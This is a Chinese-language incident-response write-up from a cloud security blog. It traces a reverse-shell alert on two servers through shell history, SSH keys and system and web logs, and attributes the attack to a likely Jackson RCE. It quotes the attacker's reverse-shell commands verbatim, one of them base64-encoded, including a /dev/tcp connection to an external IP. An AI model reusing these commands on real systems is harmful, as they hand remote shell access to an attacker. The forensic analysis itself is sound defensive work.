专栏首页腾讯云安全专家服务从一次攻击溯源中暴露的安全问题
原创

从一次攻击溯源中暴露的安全问题

被攻击了!

有两台主机在主机安全上发现了高危命令执行告警,这两台主机我们代称为A机器和B机器

主机安全告警的高危命令记录

A机器在2021年2月28日18:57:31执行了bash命令(base64编码编译执行):

/bin/sh -c bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjMuMTA4LjExMS4xOC84MCAwPiYx}|{base64,-d}|{bash,-i}

base64解密:

将此段加密内容进行base64解密后结果

B机器在2021年2月28日18:54:45执行了bash命令:

bash -i >& /dev/tcp/123.108.111.18/80 0>&1

通过上述两个特征,这是一个反弹shell命令执行,正在尝试让A机器和B机器向主机123.108.111.18发起bash连接指令


有几个问题是需要弄清楚的:

1.攻击者如何命令执行的?通过远程登录命令执行?还是通过命令执行漏洞对主机命令执行?

2.攻击者现在拿到了哪一层的权限?现在他还在不在这台主机上?

3.攻击者是通过什么漏洞弱点入侵的?

4.如何解决和修复这些问题?如何从根本上避免此类问题的出现?


开始溯源!

现在我们手上有的信息是:
1.攻击者执行的命令:bash -i >&/dev/tcp/123.108.111.18/800>&1
2.攻击者的命令执行时间:2021年2月28日18:57:31
                      2021年2月28日18:54:45
3.该主机是通过ssh密钥进行登录,不通过密码登录。

以此为线索,往下寻找

1.命令执行记录溯源:

既然我们只有命令是线索,那么我们先从命令着手寻找蛛丝马迹。

查询带有bash命令的历史:

cat ~/.bash_history|grep bash
找到了命令执行痕迹,但缺点是不显示执行用户,命令执行时间等信息

过滤服务器root用户bash命令执行历史:

cat /root/.bash_history | grep bash

我们在root用户的历史操作命令中找到了记录,因此可以证明该命令是root用户执行的

可以论证关键信息:root用户执行该命令

2.密钥审计:

为什么要进行密钥审计?因为此次案例主机通过密钥登录,为了风控和权限限制,我们在不清楚攻击者处于哪个权限层面的前提下,及时阻断其访问控制权限是当下最重要的环节。因为他有可能已经获得主机权限,写入密钥,远程登录进来了。

查询本机登录密钥:

cat /root/.ssh/authorized_keys

发现了三个不确定权限所属的登录密钥:

发现了三个不确定的公钥,沟通后及时删除,权限止损,倘若存在攻击者的密钥可随时远程登录重新获取信息和进行非法操作

3.主机层日志溯源

先搞清楚第一个问题:

1.攻击者如何命令执行的?通过远程登录命令执行?还是通过命令执行漏洞对主机命令执行?

逆向思维,从主机层分析——应用层展开分析溯源。

(1)登录日志/var/log/secure审计:

cat /var/log/secure
经审计发现,28号当日只有早11时有过一起登录记录

可以论证关键信息:攻击者并未登录过机器,是通过远程命令执行漏洞执行

这里可能会有人提出疑问,会不会有可能删除了登录痕迹?

是的,有这个可能,但是可能性很小。因为我们在命令记录中看到了是base64编码执行,如果是登录到主机上执行该反弹shell命令,站在黑客的角度,是完全没有必要进行再编码执行的。对bash反弹shell命令进行base64编码转义是远程命令执行漏洞触发绕过防护软件过滤的一种常见手段,因此可以判断攻击者并未远程登录服务器。

(2)自启动日志/var/log/cron审计

为了保证权限清理和审计万无一失,对自启动日志的审计也是关键一环,倘若命令执行是一个进程在服务器上,那么找到这个进程和脚本就是关键:

cat /var/log/cron

在自启动日志中,关键命令执行时间并无痕迹,上图只是主机安全进程的自启动日志存在记录

(3)系统日志/var/log/messagess审计

cat /var/log/messagess
在关键命令执行时间节点,未发现退出记录

结合secure,cron,messages日志综合分析,黑客未攻入主机层。

4.应用层日志溯源

服务器上部署了tomcat服务和nginx服务,那么我们可以针对nginx和tomcat的访问日志access.log和报错日志error.log开展分析溯源。

nginx日志溯源

cat /XXX/logs/nginx/access.logs
nginx的access.log日志为空,未配置开启,导致无结果可查

tomcat access.log日志溯源:

grep "28/Feb/2021:18:57" /XXX/XXX/XXX/logs/localhost_access_log.2021-02-28.txt
未发现tomcat访问日志痕迹中,存在命令执行记录

5.主机安全巡检审计

漏洞信息

使用主机安全扫描出的系统漏洞

由主机安全扫描的结果判断,大概率是由于Jackson类RCE漏洞执行成功的结果


分析结果汇总

1.攻击者执行的命令:bash -i >&/dev/tcp/123.108.111.18/800>&1
2.攻击者的命令执行时间:2021年2月28日18:57:31
                      2021年2月28日18:54:45
3.发现三个不确定性密钥,删除减小风险面。
4.攻击者未攻入主机层,只是使用了远程类命令执行漏洞触发bash反弹shell,并且是以root权限
5.应用层nginx无日志记录,无法判定具体入侵漏洞种类,但结合主机安全扫描结果,大概率是由Jackson类RCE漏洞触发bash反弹shell远程命令执行

暴露问题

1.安全漏洞未及时修复,使用组件未及时更新
2.应用层日志nginx访问日志未配置,不具备应用层日志溯源能力
3.登录密钥配置不合理,密钥文件不应运行远程scp配置修改访问,经过测试是可以通过远程scp导入公钥登录服务器的。

总结

安全是一个动态的过程,云上主机安全核心问题是:配置优化和组件迭代问题

怎么理解呢?打个比方:

我们的服务器被入侵,好比小区里某个家庭被盗

云服务厂商,好比小区物业,为用户提供房屋等基础设施,家居用品等配套组件,亦或者是家政人工服务等等。

云主机,好比用户居住的房子。

为了满足大部分用户的通用基础需求,在小区建设初期,会给用户配置统一的防盗门,统一的窗户,统一的服务配置。统一的标准化配置在配置方面,更新迭代以及整体安全性方面是便捷高效的。

但每个用户的居住需求是有区别的,有的人的房子是租来转租用的。有的人的房子里会摆放贵重物品,会把防盗门换了,窗户换了,甚至会在自己家中请保姆,不需要物业提供的服务。

门换了,小区对业主的自身的安全风险就不完全可控。

那么安全问题怎么来的呢?

小区物业关注在小区的围墙是不是够高,保安的人力配置布局是否覆盖全面,比如在DDOS攻击,APT攻击,渗透测试等方面的防御能力和检测能力。

没有对服务器组件的合理安全配置和漏洞加固,就好比门没反锁被贼打开

小区同时对各个用户家庭的门锁窗户情况也会保持监测和告警用户。但随着时间的推移,不可避免出现门锁逐渐老化,窗户年久失修,逐渐暴露出安全漏洞。而小偷是怎么进来的呢?可能是因为门没关,门锁旧了被撬开,门没反锁被打开,窗户没关,窗户掉了,从下水道过来,挖地洞进家等等原因......

但结果是,家里被偷了!

作为居住的业主,我们无法避免小偷不混进小区里。

但我们可以做的是,关好门,锁好窗,物业告诉我门坏了修门,窗坏了修窗。

这样我家要是再进贼

我就带上物业去找12315

原创声明,本文系作者授权云+社区发表,未经许可,不得转载。

如有侵权,请联系 yunjia_community@tencent.com 删除。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 蓝队的自我修养之事后溯源(归因)| HVV 经验分享

    众所周知,攻防演练过程中,攻击者千方百计使用各种方法渗透目标。一般情况下攻击链包括:侦察、武器化、交付、利用、安装、命令和控制、窃取目标数据。在溯源中,安全人员...

    字节脉搏实验室
  • 防溯源防水表—APT渗透攻击红队行动保障

    在重要的攻防对抗中进行前期的信息收集时,我们的各种渗透行为很有可能暴露自己的ip,导致们在后期进行渗透攻击行为时很容易被对方溯源,并且通过ip找到你。

    7089bAt@PowerLi
  • 解读︱SSH 暴力破解攻击瞄准这类用户,小心你的设备被利用挖矿

    腾讯云安全
  • 记一次“受到攻击后不开心从而进行溯源”的安全溯源事件

    2021年7月某日,坐在电脑前百无聊赖的我,思考着自己今后的人生“我想吃,我想喝,我想暴富”,正在沉浸在幻想的时候突然平台多了一条告警。

    FB客服
  • 网络安全运营能力建设思路:技术能力建设

    安全技术能力建设工作并非从零开始,而是以组织基础设施安全建设为基础,围绕组织机构的安全目标,建立与制度流程相配套并保证有效执行的技术和工具集,技术工具建议使用标...

    FB客服
  • 腾讯云防火墙全新升级,“三道墙”助力企业云安全防控更高效

    在云的时代,伴随更多企业客户转向公有云,基于云原生的防火墙技术逐步取代传统防火墙,成为守护企业云端安全的关键基础设施。近日,腾讯安全战略级新品——SaaS化云防...

    腾讯安全
  • 【安全通知】安全事件解析之暴力破解篇

    云上服务器如存在高危系统组件漏洞、关键系统配置不当,很容易被黑客攻击进而可能导致服务器资源被抢占、敏感信息泄露、对外攻击等严重后果。“主机安全”作为保卫服务器安...

    腾讯云主机安全
  • 技术干货|威胁情报如何在SOC场景中发挥最大价值

    数字化转型是当下企业面临的重要课题。在数字化转型过程中,每个企业都无法回避来自网络攻击的困扰。面对五花八门的安全风险,根据经验构建防御策略、部署产品的传统方式已...

    腾讯安全
  • 数据泄露频发,数据水印技术如何做到事后溯源追责?

    数据泄露是一个老生常谈的安全话题。据不完全统计,平均每天有十起以上公开曝光的数据泄露事件,从暗网数据交易监控到的各个行业数据泄露,到新冠疫情期间频频发生的公民个...

    绿盟科技研究通讯
  • 入侵溯源难点和云溯源体系建设

    服务器被攻击的时候,寻找到确切的攻击原因,还原真实攻击路径是一件非常耗时和烧脑的事情。

    万海旭
  • Linux入侵排查时安全工具整理

    当然应对Linux入侵时我们也可以使用一些自动化的安全工具协助排查溯源 并进行安全加固

    yuanfan2012
  • 某期间用到的溯源技巧

    HVV期间负责的有溯源这块的工作,整理一下用到的技巧。通常情况下,溯源需要获取到目标攻击者的一部分社会信息,比如手机号,邮箱,QQ号,微信号等,通过这些信息在互...

    用户6343818
  • TenSec 2019:腾讯安全数盾如何用AI应用实践数据保护

    伴随产业互联网的不断推进,数据已经成为企业发展的核心资产,如何守护好企业的数据资产安全,也由此成为产业升级下所有企业务必要思考的全新命题。 在6月11日-12...

    腾讯云安全
  • 暴破攻击IP模糊定位工具-Brutehunter(原创-适用linux)

    蛮力攻击(英语:Brute-force attack),又称为穷举攻击(英语:Exhaustive attack)或暴力破解,是一种密码分析的方法,即将密码进行...

    万海旭
  • 大数据分析防护云安全强势亮相国际反病毒大会

    在《网络安全法》正式实施的大背景下,11月8日,为期两天的“2017国际反病毒大会”在天津隆重召开。此次国际反病毒大会以“万物互联背景下反病毒的新挑战”为主题,...

    安恒信息
  • 张峰演讲PPT:工业互联网典型安全解决方案案例汇编2.0

    2月22日上午,在2019工业互联网峰会“工业互联网安全体系建设”分论坛上,工业互联网产业联盟(简称“联盟/AII”)安全组副主席、中国移动研究院安全所副所长张...

    安智客
  • 境外黑客叫嚣攻击我国视频系统,莫慌,绿盟威胁情报中心助您一臂之力

    近日,绿盟威胁情报中心监控到,境外黑客组织宣称将于2月13日对我国视频监控系统实施网络攻击。黑客同时声称已掌握我国境内大量摄像头控制权限,并在pastebin网...

    绿盟科技安全情报
  • 浅谈入侵溯源过程中的一些常见姿势

    攻击溯源作为安全事故中事后响应的重要组成部分,通过对受害资产与内网流量进行分析一定程度上还原攻击者的攻击路径与攻击手法,有助于修复漏洞与风险避免二次事件的发生。...

    FB客服
  • 腾讯安全新一代SaaS化云防火墙正式发布!

    作为腾讯云原生的防火墙,支持云环境下的SaaS化一键部署,性能可弹性扩展,为企业用户提供互联网边界、VPC 边界的网络访问控制;同时基于流量嵌入威胁情报、入侵防...

    腾讯安全

扫码关注云+社区

领取腾讯云代金券